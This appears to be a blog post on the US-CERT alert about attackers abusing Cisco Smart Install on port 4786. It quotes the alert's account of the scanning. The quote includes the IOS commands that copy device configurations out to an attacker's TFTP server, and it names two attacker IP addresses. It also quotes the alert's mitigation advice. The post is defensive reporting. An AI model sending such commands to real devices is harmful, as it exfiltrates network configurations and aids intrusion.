I was reading notice from MS-ISAC . - https://www.us-cert.gov/ncas/alerts/TA18-106A
Then I laughed when I saw this https://imgur.com/a/YWzU4
The specific mention of the Cisco mart Install vulnerability.
I always found it odd to see this exploit mentioned as a misuse by Cisco in 2017. I almost never seen that label before. Then to read that the tools to run this exploit was found in November of 2016. It's really shocking to see that this big exploit was out there and Cisco officially announced it in March. I understand that ACLs can prevent this exploit, but like the notice mentions it is on the ISP and service equipment that can still have this exploit.
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170214-smi
Then it was marked as a vulnerability in 2018. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
A good read about the vulnerability last year.
"Between June 29 and July 6, 2017, Russian actors used the Cisco Smart Install protocol to scan for vulnerable network devices. Two Russian cyber actor-controlled hosts, 91.207.57.69(3) and 176.223.111.160(4), connected to IPs on several network ranges on port 4786 and sent the following two commands: copy nvram:startup-config flash:/config.text copy nvram:startup-config tftp://[actor address]/[actor filename].conf In early July 2017, the commands sent to targets changed slightly, copying the running configuration file instead of the startup configuration file. Additionally, the second command copies the file saved to flash memory instead of directly copying the configuration file. copy system:running-config flash:/config.text copy flash:/config.text tftp://[ actor address]/[actor filename].conf"
A nice write up how to mitigate. Of course there's patching.
"How to Mitigate SMI Abuse Configure network devices before installing onto a network exposed to the Internet. If SMI must be used during installation, disable SMI with the “no vstack” command before placing the device into operation. Prohibit remote devices attempting to cross a network boundary over TCP port 4786 via SMI. Prohibit outbound network traffic to external devices over UDP port 69 via TFTP. See Cisco recommendations for detecting and mitigating SMI. [10] Cisco IOS runs in a variety of network devices under other labels, such as Linksys and SOHO Internet Gateway routers or firewalls as part of an Internet package by ISPs (e.g., Comcast). Check with your ISP and ensure that they have disabled SMI before or at the time of installation, or obtain instructions on how to disable it."
No comments:
Post a Comment